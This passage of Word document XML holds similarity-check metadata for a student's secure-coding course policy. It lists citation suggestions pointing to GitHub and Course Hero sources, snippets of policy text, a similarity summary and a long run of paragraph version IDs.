                  <int2:citationText>“GitHub - BrandonRicks/CS-405-Secure-Coding” n.d., https://github.com/BrandonRicks/CS-405-Secure-Coding.</int2:citationText>
                </int2:suggestion>
              </int2:suggestions>
            </int2:source>
            <int2:source int2:sourceType="Online" int2:sourceTitle="Green Pace Secure Development Policy" int2:sourceUrl="https://raw.githubusercontent.com/BrandonRicks/CS-405-Secure-Coding/main/CS%20405%20Security%20Policy.docx" int2:sourceSnippet="Historical evidence of sustained practice (emails, logs, audits, meeting notes) Enforcement. The office of the chief information security officer (OCISO) will enforce awareness and compliance of this policy, producing reports for the risk management committee (RMC) to review monthly. Every system deployed in any environment operated by Green ...">
              <int2:suggestions int2:citationType="Inline">
                <int2:suggestion int2:citationStyle="Mla" int2:isIdentical="1">
                  <int2:citationText>(“Green Pace Secure Development Policy”)</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Apa" int2:isIdentical="1">
                  <int2:citationText>(“Green Pace Secure Development Policy”)</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Chicago" int2:isIdentical="1">
                  <int2:citationText>(“Green Pace Secure Development Policy”)</int2:citationText>
                </int2:suggestion>
              </int2:suggestions>
              <int2:suggestions int2:citationType="Full">
                <int2:suggestion int2:citationStyle="Mla" int2:isIdentical="1">
                  <int2:citationText>&lt;i&gt;Green Pace Secure Development Policy&lt;/i&gt;, https://raw.githubusercontent.com/BrandonRicks/CS-405-Secure-Coding/main/CS%20405%20Security%20Policy.docx.</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Apa" int2:isIdentical="1">
                  <int2:citationText>&lt;i&gt;Green Pace Secure Development Policy&lt;/i&gt;. (n.d.). Retrieved from https://raw.githubusercontent.com/BrandonRicks/CS-405-Secure-Coding/main/CS%20405%20Security%20Policy.docx</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Chicago" int2:isIdentical="1">
                  <int2:citationText>“Green Pace Secure Development Policy” n.d., https://raw.githubusercontent.com/BrandonRicks/CS-405-Secure-Coding/main/CS%20405%20Security%20Policy.docx.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in flight, and in use Historical evidence of sustained practice (emails, logs, audits, meeting notes) Enforcement The office of the chief information security ...">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8afkpeKf" int2:invalidationBookmarkName="" int2:hashCode="axDXHV306aARx5" int2:id="qAi3XXMU">
      <int2:state int2:value="Rejected" int2:type="AugLoop_Similarity_SimilarityAnnotation"/>
      <int2:extLst>
        <oel:ext uri="426473B9-03D8-482F-96C9-C2C85392BACA">
          <int2:similarityCritique int2:version="1" int2:context="Note: Stop here for the milestone. Complete this section for Project One in Module Six.">
            <int2:source int2:sourceType="Online" int2:sourceTitle="GitHub - BrandonRicks/CS-405-Secure-Coding" int2:sourceUrl="https://github.com/BrandonRicks/CS-405-Secure-Coding" int2:sourceSnippet="Object is initialized prior to printing its value. #include &lt;iostream&gt; void f () { int i = 0; std::cout &lt;&lt; i; } Note: Stop here for the milestone. Complete this section for Project One in Module Six. Principles (s): 1: Validate Input Data 4: Keep It Simple 10: Adopt a Secure Coding Standard. Threat Level.">
              <int2:suggestions int2:citationType="Inline">
                <int2:suggestion int2:citationStyle="Mla" int2:isIdentical="0">
                  <int2:citationText>(“GitHub - BrandonRicks/CS-405-Secure-Coding”)</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Apa" int2:isIdentical="0">
                  <int2:citationText>(“GitHub - BrandonRicks/CS-405-Secure-Coding”)</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Chicago" int2:isIdentical="0">
                  <int2:citationText>(“GitHub - BrandonRicks/CS-405-Secure-Coding”)</int2:citationText>
                </int2:suggestion>
              </int2:suggestions>
              <int2:suggestions int2:citationType="Full">
                <int2:suggestion int2:citationStyle="Mla" int2:isIdentical="0">
                  <int2:citationText>&lt;i&gt;GitHub - BrandonRicks/CS-405-Secure-Coding&lt;/i&gt;, https://github.com/BrandonRicks/CS-405-Secure-Coding.</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Apa" int2:isIdentical="0">
                  <int2:citationText>&lt;i&gt;GitHub - BrandonRicks/CS-405-Secure-Coding&lt;/i&gt;. (n.d.). Retrieved from https://github.com/BrandonRicks/CS-405-Secure-Coding</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Chicago" int2:isIdentical="0">
                  <int2:citationText>“GitHub - BrandonRicks/CS-405-Secure-Coding” n.d., https://github.com/BrandonRicks/CS-405-Secure-Coding.</int2:citationText>
                </int2:suggestion>
              </int2:suggestions>
            </int2:source>
            <int2:source int2:sourceType="Online" int2:sourceTitle="CS405 Project One.docx - Green Pace Developer: Security..." int2:sourceUrl="https://www.coursehero.com/file/119742529/CS405-Project-Onedocx/" int2:sourceSnippet="12 Note: Stop here for the milestone. Complete this section for Project One in Module Six. Complete this section for Project One in Module Six. Principles(s): if a deallocation functions receives a pointer that was not obtained by an alloc function will result in an undefined behavior.">
              <int2:suggestions int2:citationType="Inline">
                <int2:suggestion int2:citationStyle="Mla" int2:isIdentical="0">
                  <int2:citationText>(“CS405 Project One.docx - Green Pace Developer: Security...”)</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Apa" int2:isIdentical="0">
                  <int2:citationText>(“CS405 Project One.docx - Green Pace Developer: Security...”)</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Chicago" int2:isIdentical="0">
                  <int2:citationText>(“CS405 Project One.docx - Green Pace Developer: Security...”)</int2:citationText>
                </int2:suggestion>
              </int2:suggestions>
              <int2:suggestions int2:citationType="Full">
                <int2:suggestion int2:citationStyle="Mla" int2:isIdentical="0">
                  <int2:citationText>&lt;i&gt;CS405 Project One.docx - Green Pace Developer: Security...&lt;/i&gt;, https://www.coursehero.com/file/119742529/CS405-Project-Onedocx/.</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Apa" int2:isIdentical="0">
                  <int2:citationText>&lt;i&gt;CS405 Project One.docx - Green Pace Developer: Security...&lt;/i&gt;. (n.d.). Retrieved from https://www.coursehero.com/file/119742529/CS405-Project-Onedocx/</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Chicago" int2:isIdentical="0">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Note: Stop here for the milestone. Complete this section for Project One in Module Six. Principle(s): Name the principle and explain how it maps to this standard ...">
              <int2:suggestions int2:citationType="Inline">
                <int2:suggestion int2:citationStyle="Mla" int2:isIdentical="0">
                  <int2:citationText>(“CS 405-exception summary report 1.docx - Green Pace...”)</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Apa" int2:isIdentical="0">
                  <int2:citationText>(“CS 405-exception summary report 1.docx - Green Pace...”)</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Chicago" int2:isIdentical="0">
                  <int2:citationText>(“CS 405-exception summary report 1.docx - Green Pace...”)</int2:citationText>
                </int2:suggestion>
              </int2:suggestions>
              <int2:suggestions int2:citationType="Full">
                <int2:suggestion int2:citationStyle="Mla" int2:isIdentical="0">
                  <int2:citationText>&lt;i&gt;CS 405-exception summary report 1.docx - Green Pace...&lt;/i&gt;, https://www.coursehero.com/file/100193701/CS-405-exception-summary-report-1docx/.</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Apa" int2:isIdentical="0">
                  <int2:citationText>&lt;i&gt;CS 405-exception summary report 1.docx - Green Pace...&lt;/i&gt;. (n.d.). Retrieved from https://www.coursehero.com/file/100193701/CS-405-exception-summary-report-1docx/</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Chicago" int2:isIdentical="0">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IgFbk4pR" int2:invalidationBookmarkName="" int2:hashCode="WF0169Cw48yaS0" int2:id="tKbMiSDD">
      <int2:state int2:value="Rejected" int2:type="AugLoop_Similarity_SimilarityAnnotation"/>
      <int2:extLst>
        <oel:ext uri="426473B9-03D8-482F-96C9-C2C85392BACA">
          <int2:similarityCritique int2:version="1" int2:context="Staff members, consultants, or employees found in violation of this policy will be subject to disciplinary action, up to and including termination.">
            <int2:source int2:sourceType="Online" int2:sourceTitle="CS 405-exception summary report 1.docx - Green Pace..." int2:sourceUrl="https://www.coursehero.com/file/100193701/CS-405-exception-summary-report-1docx/" int2:sourceSnippet="View CS 405-exception summary report 1.docx from CS 405 at Southern New Hampshire University. Green Pace Developer: Security Policy Guide Template Green Pace Secure Development ... Staff members, consultants, or employees found in violation of this policy will be subject to disciplinary action, up to and including termination. Exceptions ...">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imilarityCritique>
        </oel:ext>
      </int2:extLst>
    </int2:bookmark>
    <int2:bookmark int2:bookmarkName="_Int_FjCb3vx2" int2:invalidationBookmarkName="" int2:hashCode="m1QcEmveBACjIR" int2:id="uJUfjbGu">
      <int2:state int2:value="Rejected" int2:type="AugLoop_Similarity_SimilarityAnnotation"/>
      <int2:extLst>
        <oel:ext uri="426473B9-03D8-482F-96C9-C2C85392BACA">
          <int2:similarityCritique int2:version="1" int2:context="There are seven steps outlined below that align with the elements you will be graded on in the accompanying rubric.">
            <int2:source int2:sourceType="Online" int2:sourceTitle="CS405 Project One.docx - Green Pace Developer: Security..." int2:sourceUrl="https://www.coursehero.com/file/119742529/CS405-Project-Onedocx/" int2:sourceSnippet="Project One There are seven steps outlined below that align with the elements you will be graded on in the accompanying rubric. When you complete these steps, you will have finished the security policy. 1. Revise the C/C++ Standards You completed one of these tables for each of your standards in the Module Three milestone.">
              <int2:suggestions int2:citationType="Inline">
                <int2:suggestion int2:citationStyle="Mla" int2:isIdentical="1">
                  <int2:citationText>(“CS405 Project One.docx - Green Pace Developer: Security...”)</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Apa" int2:isIdentical="1">
                  <int2:citationText>(“CS405 Project One.docx - Green Pace Developer: Security...”)</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Chicago" int2:isIdentical="1">
                  <int2:citationText>(“CS405 Project One.docx - Green Pace Developer: Security...”)</int2:citationText>
                </int2:suggestion>
              </int2:suggestions>
              <int2:suggestions int2:citationType="Full">
                <int2:suggestion int2:citationStyle="Mla" int2:isIdentical="1">
                  <int2:citationText>&lt;i&gt;CS405 Project One.docx - Green Pace Developer: Security...&lt;/i&gt;, https://www.coursehero.com/file/119742529/CS405-Project-Onedocx/.</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Apa" int2:isIdentical="1">
                  <int2:citationText>&lt;i&gt;CS405 Project One.docx - Green Pace Developer: Security...&lt;/i&gt;. (n.d.). Retrieved from https://www.coursehero.com/file/119742529/CS405-Project-Onedocx/</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Chicago" int2:isIdentical="1">
                  <int2:citationText>“CS405 Project One.docx - Green Pace Developer: Security...” n.d., https://www.coursehero.com/file/119742529/CS405-Project-Onedocx/.</int2:citationText>
                </int2:suggestion>
              </int2:suggestions>
            </int2:source>
            <int2:source int2:sourceType="Online" int2:sourceTitle="CS 405-exception summary report 1.docx - Green Pace..." int2:sourceUrl="https://www.coursehero.com/file/100193701/CS-405-exception-summary-report-1docx/" int2:sourceSnippet="Automation [Insert text.] [Insert text.]. [Insert text.] 14 Defense-in-Depth Illustration This illustration provides a visual representation of the defense-in-depth best practice of layered security. Project One: There are seven steps outlined below that align with the elements you will be graded on in the accompanying rubric.">
              <int2:suggestions int2:citationType="Inline">
                <int2:suggestion int2:citationStyle="Mla" int2:isIdentical="1">
                  <int2:citationText>(“CS 405-exception summary report 1.docx - Green Pace...”)</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Apa" int2:isIdentical="1">
                  <int2:citationText>(“CS 405-exception summary report 1.docx - Green Pace...”)</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Chicago" int2:isIdentical="1">
                  <int2:citationText>(“CS 405-exception summary report 1.docx - Green Pace...”)</int2:citationText>
                </int2:suggestion>
              </int2:suggestions>
              <int2:suggestions int2:citationType="Full">
                <int2:suggestion int2:citationStyle="Mla" int2:isIdentical="1">
                  <int2:citationText>&lt;i&gt;CS 405-exception summary report 1.docx - Green Pace...&lt;/i&gt;, https://www.coursehero.com/file/100193701/CS-405-exception-summary-report-1docx/.</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Apa" int2:isIdentical="1">
                  <int2:citationText>&lt;i&gt;CS 405-exception summary report 1.docx - Green Pace...&lt;/i&gt;. (n.d.). Retrieved from https://www.coursehero.com/file/100193701/CS-405-exception-summary-report-1docx/</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Chicago" int2:isIdentical="1">
                  <int2:citationText>“CS 405-exception summary report 1.docx - Green Pace...” n.d., https://www.coursehero.com/file/100193701/CS-405-exception-summary-report-1docx/.</int2:citationText>
                </int2:suggestion>
              </int2:suggestions>
            </int2:source>
          </int2:similarityCritique>
        </oel:ext>
      </int2:extLst>
    </int2:bookmark>
    <int2:entireDocument int2:id="HNxqDXhm">
      <int2:extLst>
        <oel:ext uri="E302BA01-7950-474C-9AD3-286E660C40A8">
          <int2:similaritySummary int2:version="1" int2:runId="1716406455631" int2:tilesCheckedInThisRun="729" int2:totalNumOfTiles="729" int2:similarityAnnotationCount="51" int2:numWords="3262" int2:numFlaggedWords="1134"/>
        </oel:ext>
      </int2:extLst>
    </int2:entireDocument>
  </int2:observations>
  <int2:intelligenceSettings/>
  <int2:onDemandWorkflows>
    <int2:onDemandWorkflow int2:type="SimilarityCheck" int2:paragraphVersions="342CAF75-77777777 3153DCD8-77777777 794C0CED-77777777 7598E4B8-77777777 058B542B-77777777 4D28A9B2-77777777 2C02F4B9-77777777 087315A2-77777777 421192B6-77777777 37362610-77777777 335EF467-77777777 5CD2DCEC-77777777 20722AD8-77777777 56E26387-77777777 461121B0-77777777 1A462924-77777777 10A51981-77777777 28D03205-77777777 561BC095-77777777 01B7FB02-77777777 0A253E44-77777777 51D27592-77777777 11F53BB9-77777777 0800DCA9-77777777 241DF891-77777777 2CD59CDB-77777777 19EF50A8-77777777 0CF6015F-77777777 549F3FCD-77777777 7C5F6E57-77777777 7418FBC2-77777777 7D7F40ED-77777777 15EAC341-77777777 6A515187-77777777 4CB19BBB-77777777 54B04028-77777777 089A159A-77777777 1A3B6AF9-77777777 74838482-77777777 747F55F3-77777777 54114CAD-77777777 36B77D5D-77777777 38511D92-77777777 1AE83A24-77777777 5A0B3139-708E8C4A 7A6C2FBF-77777777 23709CA3-77777777 3235E292-1667E03A 5841CE35-77777777 6F90B8EB-77777777 1E12FE44-77777777 59B149F2-77777777 016EC18E-77777777 61E5D479-77777777 49150035-3268B131 6BE3B661-77777777 19D888A6-5D938AC9 2BD17089-77777777 1CD70579-11F51825 29868A13-77777777 296BB2E0-643D911E 32FDE57A-77777777 515937A9-36178040 69014F31-77777777 7247E8FC-3170055F 6A64234C-77777777 1EAAFE91-5AE0FB16 68763967-77777777 1A852539-270A3865 543BFFD7-77777777 1CD2AC55-249D9A04 397F83AB-77777777 6BEB1647-2FCD2D2D 27FBDA56-77777777 03F3DEAD-77777777 3DB246A0-77777777 7B4C2F4E-77777777 34BFB29B-77777777 3933B41C-77777777 0F915ACF-77777777 5655795C-77777777 14A31A47-77777777 5033E0B8-77777777 7140E542-728A966D 049B2191-77777777 4E637544-77777777 243A50BD-77777777 3ECD0D5A-311810B5 41D243A6-77777777 3A7A0502-77777777 196051A4-77777777 783CC6FF-0345BA03 14107C1E-77777777 57764A23-77777777 7007063D-34A703F7 5B24A375-77777777 279FAFC0-77777777 34260FF9-77777777 333F9847-77777777 29C1A6F3-77777777 052E72E0-77777777 61F9B07F-77777777 49A8E1A2-77777777 6EE4DA51-77777777 5C9846CA-77777777 58E0ACD7-77777777 3E539ECE-77777777 02ABBB49-77777777 113C8EF4-77777777 5B44D94B-77777777 7B50FAFE-77777777 6CB9DFED-77777777 31D07877-77777777 0F729ADB-77777777 3AAB69D9-77777777 5D087CB4-77777777 29A4DB2F-77777777 32410B1A-77777777 0453C4CF-77777777 1CB1DCF1-77777777 6E75D5AD-77777777 608B3879-77777777 58025751-77777777 6CDCA4B3-77777777 67A764E8-77777777 20F95697-77777777 187BA178-77777777 59EE3E6D-77777777 23DDC087-77777777 7D20E9A0-77777777 72AFA4CB-77777777 575201BF-77777777 0019DBED-77777777 7B16B6E9-77777777 3174021B-77777777 68AB826D-77777777 16B76F95-77777777 164074C2-3559E430 47E37B6A-77777777 7D026F64-77777777 5D3CE0D9-77777777 7E0C2F48-064FD866 7FE55C46-77777777 1D11EC8F-77777777 28FF788C-77777777 4F4DA9C0-402D8756 5A8644E7-77777777 6C0E2E27-77777777 770D7F02-010F4637 17196CB2-77777777 456BB58A-77777777 502056E8-77777777 03B2F214-77777777 02FD9D0C-77777777 567E762D-77777777 4C888B9E-77777777 00278D98-77777777 086FA0F7-77777777 3D7EE5AB-77777777 483DB358-77777777 0216068C-77777777 5552E762-77777777 688372DD-77777777 15DA8771-77777777 7B8AB6E4-77777777 1397358D-77777777 2AEE2B48-77777777 0F8CDDEE-77777777 2A2ABA7F-77777777 4441551B-77777777 196AC4C7-77777777 4E4CBBF1-77777777 70D2F7C5-77777777 68783DFF-77777777 67EF3C2C-77777777 5404A3BA-77777777 5109F248-77777777 05A09A96-77777777 7D572B94-77777777 0880DBB9-77777777 527A0ABE-77777777 2EFB0041-77777777 6E45804C-77777777 73D74ACF-77777777 255DE229-77777777 1DB9F538-77777777 02013346-77777777 0318B450-77777777 65CA1729-77777777 0EB153B1-77777777 43E4753B-77777777 2E7240A9-4B31175B 31A51ED8-77777777 269D0DFA-77777777 668C7FBC-77777777 12374FA0-42056527 0076DC7F-77777777 6AF5A104-77777777 6462B54D-77777777 5286DB6F-64065359 177CC804-77777777 29120604-77777777 337D82A6-78AA1C81 2302627B-77777777 2D88D723-77777777 75B21402-77777777 4BB676B4-77777777 31F4B979-77777777 147C27E2-77777777 7A12C32B-77777777 0264479C-77777777 5C1BDC13-77777777 33D6ABC8-77777777 4D88F132-77777777 1999E754-77777777 4900EA45-77777777 432832E8-77777777 7835BFF3-77777777 4111CD08-77777777 62F37A34-77777777 31A415FA-77777777 39F0D11B-77777777 6692C9F4-77777777 285A8AFB-77777777 349283E5-77777777 27D17B6B-77777777 2A788F9D-77777777 6E2A4868-77777777 6728BDD5-77777777 378ECFD3-77777777 7CC79B01-77777777 10926EE6-77777777 5CB53902-77777777 7E6AC12A-77777777 608161A4-77777777 5E8BB44E-77777777 30910B79-77777777 79958274-77777777 77BA89C2-77777777 4A43CDCA-77777777 263A9108-77777777 2FDAA0CC-77777777 7157711F-77777777 68B8C0CF-77777777 12C9A6C2-77777777 5D0F26FC-50248140 194F6BAF-77777777 16E2D2DF-77777777 70470021-77777777 2AE2AEF7-31148989 3B2E1D55-77777777 73281F91-77777777 457B7890-77777777 4E978D2E-7BED0C3B 28F220E8-77777777 6BE535A7-77777777 53482B8C-721B6FFE 3D10232A-77777777 2F21D834-77777777 4070037B-77777777 24424F31-77777777 1EE4C58C-77777777 497B4EEC-77777777 1A8F7D04-77777777 78F3D274-77777777 3CDD9AA9-77777777 1C831C3D-77777777 6CDF17A4-77777777 459AD35B-77777777 45532BCB-77777777 22C3E530-77777777 503C1F21-77777777 2D8313C6-77777777 189A6428-77777777 7601021C-77777777 5D423C47-77777777 510F5ED6-77777777 55B618EC-77777777 45E70620-77777777 7D7DAF61-77777777 59BE0E81-77777777 6B3F44DA-77777777 75413ECD-77777777 730AD398-77777777 01646044-77777777 02CDAF81-77777777 27D28E14-77777777 72D2ADAE-77777777 175DCE5F-77777777 04C2C431-77777777 3EED4FB0-77777777 55083CAD-77777777 380C8C65-77777777 5472C679-77777777 5234EA3F-77777777 530B4801-77777777 72D63563-77777777 6EDD4E9B-77777777 3B1D880B-77777777 76F8F206-5C5A568F 3E7DD32D-77777777 7C1B4E18-77777777 326BE9E1-77777777 7C4D0934-21A45504 358849FC-77777777 488B24B5-77777777 74D97636-77777777 681B4B09-385E4A1A 64928297-77777777 63A8CD6B-77777777 5DDD77A8-01ACD9A2 1CB935FE-77777777 085911CA-77777777 5C0C34EB-77777777 5B570099-77777777 33BED6A2-77777777 3B3CD1A7-77777777 2743D47A-77777777 265C59C7-77777777 3FECF226-77777777 001260E5-77777777 5C1BD06F-77777777 321828B7-77777777 71DDDCA7-77777777 6766EDC6-77777777 72BCAF8D-77777777 4BA7A045-77777777 78BC4E34-77777777 6B112A9B-77777777 699288A5-77777777 35911E79-77777777 1B4ADD74-77777777 221E6849-77777777 4AE4D8D3-77777777 485EEED8-77777777 7CFDA649-77777777 29E14C36-77777777 7589B551-77777777 3EFDCB9A-77777777 2978B16E-77777777 163BA4AD-77777777 0EAC101A-77777777 79F266AC-77777777 6359BB49-77777777 0472C174-77777777 2419AE4D-77777777 0840904D-77777777 2FEC82A9-77777777 1F5D5913-77777777 5B2EF2E9-77777777 3329B9A6-77777777 10DFB9F2-77777777 71ED323B-77777777 33ACFFEA-505BD93A 2229A95F-77777777 3353671F-77777777 40542A0F-77777777 28BA138C-5F25DD7D 01156A35-77777777 2D981A71-77777777 5E4C3A21-77777777 2E312001-4AAEE2BF 4419F26B-77777777 3275D22E-77777777 6D0D0A59-00E996DD 0D2D4A1C-77777777 1D80D2F7-77777777 722A0972-77777777 51B951B3-77777777 4D802076-77777777 476A1FF1-77777777 4D58288E-77777777 325BC76A-77777777 05FDEF4C-77777777 79D1FC84-77777777 07D13FDB-77777777 018B5741-77777777 4632396F-77777777 0FD229D3-77777777 0C9B369B-77777777 398A9F91-77777777 16184D8D-77777777 3D63E5D3-77777777 642C6635-77777777 1659F964-77777777 14C127A7-77777777 511AFF98-77777777 1DD1CB55-77777777 147234E7-77777777 7C643E28-77777777 2CB1863C-77777777 4DFBB62B-77777777 4C886138-77777777 270673C4-77777777 3D93F88D-77777777 1EC45772-77777777 6D5B7F9C-77777777 6A3B83A6-77777777 08365A70-77777777 1018DE5F-77777777 25179278-77777777 145AC2AA-77777777 78EAA8A7-77777777 5D551803-77777777 248702FC-77777777 52E66095-77777777 6B141EF9-77777777 7DF53768-3E254B4E 28913F6B-77777777 673AC0B0-77777777 7B4D7018-77777777 728394A2-1C4D5B74 789A568F-77777777 53F79DB1-77777777 2E6C6D57-77777777 1B81CDBB-5EBA2956 654D300E-77777777 5D3977C1-77777777 00B40BD2-2FF33E3A 37CB6A9A-77777777 11C55946-77777777 5AFE7A97-77777777 6FB1DA7B-77777777 1517828B-77777777 41F7CAAA-77777777 5A26B020-77777777 3A5DE4FC-77777777 3F2670C9-77777777 40C1B5AC-77777777 62635B7A-77777777 18B948EA-77777777 004F8A69-77777777 067D89AF-77777777 1917A025-77777777 3A677BAD-77777777 2F007367-77777777 3F580697-77777777 6FBCAECC-77777777 348AB2BC-77777777 47F79C0E-77777777 012AA30D-77777777 1C940DF2-77777777 76E7C4D8-77777777 34777AB2-77777777 66AACB9D-77777777 09BFA1F8-77777777 17B55B3F-77777777 237A438D-77777777 247E2C86-77777777 79BB9036-77777777 2B986054-77777777 0FB441F9-77777777 11539D90-77777777 093EBE73-77777777 471CFF25-77777777 3E74FF37-77777777 296FB37A-77777777 3D4528A3-77777777 2134BC79-77777777 5263DFFB-77777777 5C9484A9-77777777 48B2377D-459E062D 53AECA82-77777777 739BCE24-77777777 28A53CB3-77777777 01CC8C03-21A70D9D 44D39738-77777777 045D19F0-77777777 025628B0-77777777 0D2047C3-20C21202 4D273B38-77777777 7517B5DF-77777777 29A926BF-4E93CF3B 0F476CC9-77777777 422505A7-77777777 2156BF12-77777777 17ECE27E-77777777 75B9C427-77777777 72A6F7D6-77777777 0A7ECDB3-77777777 220323A9-77777777 6D7BD83E-77777777 4323B829-77777777 4C5CDDA0-77777777 21AF3013-77777777 58211FED-77777777 09D2A822-77777777 7188DC71-77777777 2A7DCED1-77777777 3773F3D4-77777777 765DE5ED-77777777 4BEC1ECA-77777777 3C6600F4-77777777 303F54C0-77777777 08A327DD-77777777 1D888D34-77777777 1A9DC142-77777777 310BD1C0-77777777 2D7A853F-77777777 258CE126-77777777 28A63EAE-77777777 0CBF64D1-77777777 258B63F8-77777777 24E01C55-77777777 44AB9F5A-77777777 070D1B90-77777777 1CE70AF4-77777777 065938C1-77777777 27E2FD83-77777777 4A24434F-77777777 6C371ACB-77777777 190BC992-77777777 7440A833-77777777 59489C3C-77777777 519E82BC-77777777 490A5770-6BB57CB4 40E2635A-77777777 480A4358-77777777 71F8514F-77777777 5E1D505C-1781D7B0 24FAD59F-77777777 45E1F31A-77777777 690DE7EA-77777777 316D7001-6B3C38D3 06061C9A-77777777 3383FF43-77777777 69E47378-09AABEFB 290ADCC0-77777777 20C36A53-77777777 03D2AAF4-77777777 43F4F9FA-77777777 2826D386-77777777 748D7E23-77777777 732D0956-77777777 2D640FC1-77777777 72BD1BCD-77777777 5BE08C9E-77777777 507F810F-77777777 4686F95C-77777777 361D847E-77777777 2570B35C-77777777 6F9DA53D-77777777 0DD906AE-77777777 59E1FBE1-77777777 4D88C932-77777777 486E9681-77777777 5590A5CF-77777777 2935D2F6-77777777 10EAFC44-77777777 1FA053B5-77777777 64B7FC40-77777777 0155179E-77777777 3877BF3F-77777777 000C184C-77777777 6B0CCC4F-77777777 6506F573-77777777 570322E7-77777777 09F1CB00-77777777 1C057DF1-77777777 19BD5035-77777777 0EBAC9F0-77777777 243691C2-77777777 5C8284A2-77777777 16272DCB-77777777 781490A5-77777777 47FE0A38-77777777 77DADEFB-77777777 51DBA6AD-77777777 72961103-77777777 02179BF3-400BE47F 7EBCA8F9-77777777 26AB4A33-77777777 02D8D96A-77777777 6BD9F1DC-766D5FB9 2FFF2133-77777777 69A97898-77777777 5CEF81B9-77777777 09D5B7CA-5CFE41CB 67786E73-77777777 123223BF-77777777 2892146E-21694721 6B71C6F9-77777777 06EB4183-77777777 0A3CE63B-77777777 5D591C48-77777777 3E9ECE7F-77777777 6D64BDE5-77777777 4CD5D946-77777777 087DC360-77777777 5BBCF7D7-77777777 7B7CD542-77777777 7F0E433A-77777777 61360AD2-77777777 3CF3A9FD-77777777 6ACD25C0-77777777 5B2E2498-77777777 143EC026-77777777 465E3EFB-77777777 28A30079-77777777 48BBAB8E-77777777 62B1460B-77777777 45D8FD92-77777777 3084A142-77777777 7134DB5C-77777777 13D0400D-77777777 3735EE4B-77777777 2B03763C-77777777 0A4D6880-77777777 56AE9F2F-77777777 041DC01E-77777777 046003E9-77777777 1D1784AB-77777777 2A494700-77777777 58358B4A-77777777 192D69E1-77777777 048F96A9-77777777 1393827A-77777777 1D0134D3-77777777 52544676-77777777 06200579-77777777 157E95F4-77777777 344B5E73-77777777 4A732D14-77777777 3F954729-77777777 5CD7C323-77777777 5C660E59-77777777 5241571B-77777777 2FB77A6E-77777777 2CE09CB6-77777777 3FE8C849-77777777 60586E03-77777777 3B814C98-77777777 6A644573-77777777 23C92BA3-77777777 779BE467-77777777 32963B9B-77777777 48796A45-77777777 74EEC569-77777777 07184003-77777777 485C7819-77777777 1E783C16-77777777 05A5EC24-77777777 4960D3E1-77777777 22AD3E6C-77777777 6B408D59-77777777 267B808D-77777777 6AFF6661-77777777 63078A2D-77777777 334CD2C4-77777777 253E6AB1-77777777 3779210C-77777777 3CF590EB-77777777 33C54CC1-77777777 331E6999-77777777 30C5D21F-77777777 301ACA4D-77777777 5221428A-77777777 61027C5A-77777777 376968D4-77777777 61E76894-77777777 05A3CE43-77777777 782C814E-77777777 11F4BE0E-77777777 752BE477-77777777 2FE8B114-77777777 0CDE0BE2-77777777 3D7A98BF-77777777 2342A158-77777777 4BFFD498-77777777 308B96BF-77777777 7622FAD2-77777777 36FD3789-77777777 2B485651-77777777 11242936-77777777 467A999D-77777777 6864030F-77777777 5FD64D49-77777777 3B5FC682-77777777 644F2CA9-77777777 4C713B84-77777777 7100264D-77777777 2DCA5B40-77777777 471B62B8-77777777 00A6F6BA-77777777 2053F4CB-77777777 4FE2E491-77777777 6FA73728-77777777 7CFBEC18-77777777 679D4A94-77777777 18430555-77777777 5E304121-77777777 7C3F721D-77777777 7849A9EA-77777777 3D0880A0-77777777 0A3B5577-77777777 214A79D1-77777777 41301A9F-77777777 6D7A1B7A-77777777 58D14EE0-77777777 70CBCE53-77777777 55B7417C-77777777 72580B49-77777777 36B5D62C-77777777 78E62A20-77777777 44647100-77777777 5C4FF30D-77777777 022C22B4-77777777 723BF2DC-77777777 00E0C6DB-77777777 4A397D60-77777777 7989A450-77777777 30718AF9-77777777 0EED3A51-77777777 3DE2F052-77777777 462A4AC9-77777777 5F83E86B-77777777 3ADCADD2-77777777 3F051699-77777777 4140C618-77777777 6CFC70BD-77777777 2B7E03B0-77777777 1C6048B0-77777777 5ADB37ED-77777777 26FD7197-77777777 63FB764F-77777777 40F6A757-77777777 517E8AFF-77777777 7EA74308-77777777 752EAA92-77777777 1A52A4BE-77777777 6F86D0AE-77777777 2200A43D-77777777 0DA989E9-77777777 3C1C69A4-77777777 065B3FB5-77777777 75A7A4D8-77777777 3B6BE51C-3666D736 354139B7-77777777 224FF374-5612E759 2E421E78-77777777 3478FBBD-77777777 205E4EEA-77777777 5D0624E6-77777777 4FC266BE-77777777 5AA02C35-28B7664F 4DCCC24C-77777777 0BE71DB8-2102DD0A 3C6BD218-77777777 16E52C37-77777777 70DDEFB4-77777777 2BEEC775-77777777 0266ACF9-77777777 38067B4A-77777777 08A5E450-77777777 5F347F24-77777777 6D12B718-77777777 020713C6-77777777 43A27943-77777777 4B12DFB3-77777777 1B38047B-77777777 4F10AB23-77777777 4D82505B-77777777 1B518974-77777777 2212EB2D-77777777 4AD4F47D-77777777 66B442C3-77777777 2C722D80-77777777 3348483D-77777777 77082399-77777777 